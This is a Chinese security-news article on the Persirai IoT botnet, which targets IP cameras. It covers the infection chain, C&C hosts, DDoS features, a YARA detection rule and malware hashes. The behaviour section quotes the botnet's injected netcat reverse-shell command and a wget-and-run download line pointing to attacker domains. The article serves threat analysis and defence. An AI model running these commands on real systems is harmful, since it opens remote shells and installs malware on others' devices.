d3214

d3214
FB招聘站
分类阅读
专栏
公开课
FIT 2019
企业服务
用户服务
搜索
投稿
登录
注册
以网络摄像头为感染目标的新型IoT僵尸网络Persirai clouds专栏作者2017-05-17共280994人围观 网络安全资讯
Security_Camera_2.jpg

趋势科技（Trend Micro）最近发现了一种新型物联网（IoT）僵尸网络，该僵尸网络利用恶意软件 ELF_PERSIRAI.A进行不断传播感染。据分析，目前已有多家原始设备制造商（OEM）的1000多种型号网络摄像头产品受此恶意网络感染，但趋势科技并未透露详细受影响制造商，下一步可能会和相关制造商配合进行感染识别和漏洞修复。这可能是继Mirai和Hajime之后又一波针对IoT设备的新型攻击力量，趋势科技把其命名为Persirai。

趋势科技通过Shodan发现，大约有120,000台网络摄像设备面临感染Persirai的风险，这些设备赤裸裸地暴露在网，极易被攻击者通过其设备80端口入侵Web管理页面，形成感染控制，然而，其设备使用者却对此毫无意识。以下是4月26日的Persirai感染趋势图，从图中可以看出，中国是该类僵尸网络感染的重灾区，仅大陆地区的感染率就高达20.3%。

persirai-map-01-1-1024x655.jpg

行为分析
通常，在用户内部网络中，网络摄像头通常可以使用路由器的即插即用(UPnP)协议功能进行端口映射，使得用户可以通过广域网远程访问到设备，而这也带来了感染IoT恶意软件的风险。Persirai正是利用恶意软件ELF_PERSIRAI.A，对暴露在网的网络摄像头进行传播感染：

2.jpg

目前，这种攻击的大部分受影响设备由于未更改默认出厂密码或存在弱口令，攻击者通过密码组合进行大规模的自动化入侵登录，进入网络摄像头的Web管理接口后，通过以下注入命令强制摄像设备连接到一个下载网站执行恶意文件下载：

$(nc load.gtpnet.ir 1234 -e /bin/sh)

之后，远端下载网站将会给出以下命令响应，通知被控制的网络摄像头从域名连接ntp.gtpnet.ir处下载恶意shell脚本文件：

busybox nohup sh -c “killall encoder ;wget http://ntp.gtpnet.ir/wificam.sh -O /tmp/a.sh ;chmod +x /tmp/a.sh ;/tmp/a.sh” > /dev/null 2>&1 &

其中， wificam.sh脚本将会下载并执行以下恶意样本文件，并在所有恶意程序完全执行之后，进行自毁删除。

ssss.jpg

所有恶意样本程序将会在被控网络摄像设备的内存中运行，同时，将会在被控设备系统的/dev/null目录下生成ftpupdate.sh和ftpupload.sh，以阻止0day漏洞和其它形式对被控设备的攻击。然而，如果被控设备一旦执行重新启动操作，也不能消除此类隐患，恶意软件也将迅速对该设备形成攻击。

C&C控制
网络摄像头一旦被感染控制后，将会与以下C&C服务器执行通信响应：

load.gtpnet.ir

ntp.gtpnet.ir

185.62.189.232

95.85.38.103

接收到C&C服务器的响应信息之后，被控摄像头将会利用前不久公开的一个0day漏洞利用模块，自动对其它网络摄像头发起攻击。不论目标网络摄像设备的密码有多复杂，攻击者都能利用该漏洞获取设备的用户密码文件，进而进行命令注入。以下是该漏洞的一个攻击payload：

3.jpg

当然，被控摄像头还能从C&C服务器处接收对其它网络系统的DDoS攻击指令。值得注意的是，Persirai可以利用SSDP包（简单服务发现协议包），不需要执行IP地址欺骗，就能发起UDP方式的DDoS攻击。以下为其DDoS攻击中使用的特殊“后门”协议：

4.jpg

箭头所指部分标明了被控设备与C&C服务器的通信方式，其中包含了攻击命令和攻击目标的IP地址和端口号。

趋势科技发现的C&C服务器使用了伊朗的.ir后缀域名，而该后缀域名由伊朗某研究机构严格管理，只限伊朗人使用。另外，我们还发现该恶意软件作者使用的一些有意思的波斯语言符号：

5.jpg

我们曾对用来分析的被感染设备尝试进行固件更新，但更新过程中，其更新状态却提示当前固件已经是最新版本。如下图所示：

6.jpg

总结
在Mirai轰轰烈烈成为首个感染IoT设备的恶意软件之后，其代码的开源性特点也会成为未来IoT类恶意软件的可用之处。随着物联网时代的到来，网络犯罪份子将会从传统的NTP和DNS服务中脱离开来，使用IoT设备发起DDoS攻击。而对普通IoT设备用户来说，其对设备采取的脆弱安全性措施将会加剧物联网安全问题的严重性。

默认密码、出厂密码、弱口令都将会是攻击者进行攻击利用的途径，然而，以上分析中也表明即使是强壮口令也不能免于攻击。除此之外，物联网设备使用者应该采取多种手段来防止攻击，如禁用路由器中的UPNP功能以免于IoT设备和端口的暴露在线、及时更新固件等。当然，IoT安全也不完全是终端用户的事，还需要设备制造商供应商在生产环节把好安全生产关，才能共筑未来物联网安全。

检测Persirai的YARA规则与HASH
YARA规则：

rule Persirai {
meta:
description = “Detects Persirai Botnet Malware”
author = “Tim Yeh”
reference = “Internal Research”
date = “2017-04-21”
hash1 = “f736948bb4575c10a3175f0078a2b5d36cce1aa4cd635307d03c826e305a7489”
hash2 = “e0b5c9f874f260c840766eb23c1f69828545d7820f959c8601c41c024044f02c”
hash3 = “35317971e346e5b2a8401b2e66b9e62e371ce9532f816cb313216c3647973c32”
hash4 = “ff5db7bdb4de17a77bd4a552f50f0e5488281cedc934fc3707833f90484ef66c”
hash5 = “ec2c39f1dfb75e7b33daceaeda4dbadb8efd9015a9b7e41d595bb28d2cd0180f”

strings:
$x1 = “ftpupload.sh” fullword ascii
$x2 = “/dev/misc/watchdog” fullword ascii
$x3 = “/dev/watchdog” ascii
$x4 = “:52869/picsdesc.xml” fullword ascii
$x5 = “npxXoudifFeEgGaACScs” fullword ascii

$s1 = “ftptest.cgi” fullword ascii
$s2 = “set_ftp.cgi” fullword ascii
$s3 = “2580e538f3723927f1ea2fdb8d57b99e9cc37ced1” fullword ascii
$s4 = “023ea8c671c0abf77241886465200cf81b1a2bf5e” fullword ascii

condition:
uint16(0) == 0x457f and filesize < 300KB and ( ( 1 of ($x*) and 1 of ($s*) ) or 2 of ($s*) ) } Persirai利用的恶意软件ELF_PERSIRAI.A SHA256相关哈希值： d00b79a0b47ae38b2d6fbbf994a2075bc70dc88142536f283e8447ed03917e45 f974695ae560c6f035e089271ee33a84bebeb940be510ab5066ee958932e310a af4aa29d6e3fce9206b0d21b09b7bc40c3a2128bc5eb02ff239ed2f3549532bb aa443f81cbba72e1692246b5647a9278040400a86afc8e171f54577dc9324f61 4a5ff1def77deb11ddecd10f96e4a1de69291f2f879cd83186c6b3fc20bb009a 44620a09441305f592fb65d606958611f90e85b62b7ef7149e613d794df3a778 a58769740a750a8b265df65a5b143a06972af2e7d82c5040d908e71474cbaf92 7d7aaa8c9a36324a2c5e9b0a3440344502f28b90776baa6b8dac7ac88a83aef0 4a5d00f91a5bb2b6b89ccdabc6c13eab97ede5848275513ded7dfd5803b1074b 264e5a7ce9ca7ce7a495ccb02e8f268290fcb1b3e1b05f87d3214b26b0ea9adc ff5db7bdb4de17a77bd4a552f50f0e5488281cedc934fc3707833f90484ef66c ec2c39f1dfb75e7b33daceaeda4dbadb8efd9015a9b7e41d595bb28d2cd0180f f736948bb4575c10a3175f0078a2b5d36cce1aa4cd635307d03c826e305a7489 e0b5c9f874f260c840766eb23c1f69828545d7820f959c8601c41c024044f02c 35317971e346e5b2a8401b2e66b9e62e371ce9532f816cb313216c3647973c32 *参考来源：TrendMicro，freebuf小编clouds编译，转载请注明来自FreeBuf.com。 clouds clouds 297 篇文章 等级： 9级 || 上一篇：维基解密披露CIA恶意软件框架中的新工具：AfterMidnight与Assassin下一篇：下一个“永恒之蓝”6月见？Shadow Brokers组织宣布将公开更多0day漏洞！ 昵称 请输入昵称 必须您当前尚未登录。登陆？注册邮箱 请输入邮箱地址 必须（保密）表情插图 有人回复时邮件通知我 clouds clouds专栏作者 I am a robot ,do not talk to me ,code to me. 297 文章数 38 评论数 最近文章 赛门铁克发现朝鲜APT组织Lazarus攻击金融机构的关键性工具 2018.11.20 挖洞经验 | HackerOne的双因素认证和上报者黑名单绕过漏洞（$10,000） 2018.11.20 挖洞经验 | HackerOne安全团队内部处理附件导出漏洞（$12,500） 2018.11.19 浏览更多 相关阅读 韩国APT攻击剑指俄罗斯白名单安全厂商Bit9遭入侵，致恶意软件被信任运行未知攻，焉知防？——DDoS攻击方法之分析SQL Injection的深入探讨【FB TV】一周「BUF大事件」：比特币跳崖式暴跌，看黑客去中心化攻击；苹果技术顾问窃取用户信息并恐吓威胁；上百款吃鸡游戏辅助被植入挖矿木马 特别推荐 关注我们 分享每日精选文章 活动预告 11月 FreeBuf精品公开课·双11学习狂欢节 | 给努力的你打打气 已结束 10月 【16课时-连载中】挖掘CVE不是梦（系列课程2） 已结束 10月 【首节课仅需1元】挖掘CVE不是梦 已结束 9月 【已结束】自炼神兵之自动化批量刷SRC 已结束 FREEBUF免责声明协议条款关于我们加入我们广告及服务寻求报道广告合作联系我们友情链接关注我们 官方微信 新浪微博腾讯微博Twitter赞助商 Copyright © 2018 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号 css.php 正在加载中...0daybank